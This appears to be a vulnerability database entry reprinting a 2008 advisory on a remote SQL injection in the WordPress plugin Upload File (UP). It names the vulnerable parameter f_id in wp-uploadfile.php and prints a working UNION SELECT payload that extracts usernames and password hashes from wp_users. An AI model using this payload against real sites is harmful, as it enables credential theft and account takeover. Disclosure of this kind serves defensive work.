vuln in WordPress plugin Upload File(UP)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052725 漏洞类型
发布时间 2008-05-25 更新时间 2008-05-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008050003
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 New Advisory:
Wordpress Plugin Upload File(UP) Remote SQL Injection


--------------------Summary----------------
Software: Upload File (WordPress Plugin)
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: eserg.ru

-----------------Description---------------
1. SQL Injection.

http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]
SQL query:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*

--------------PoC/Exploit----------------------
Waiting for developer(s) reply.

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Regards,
Belsec Team
http://eserg.ru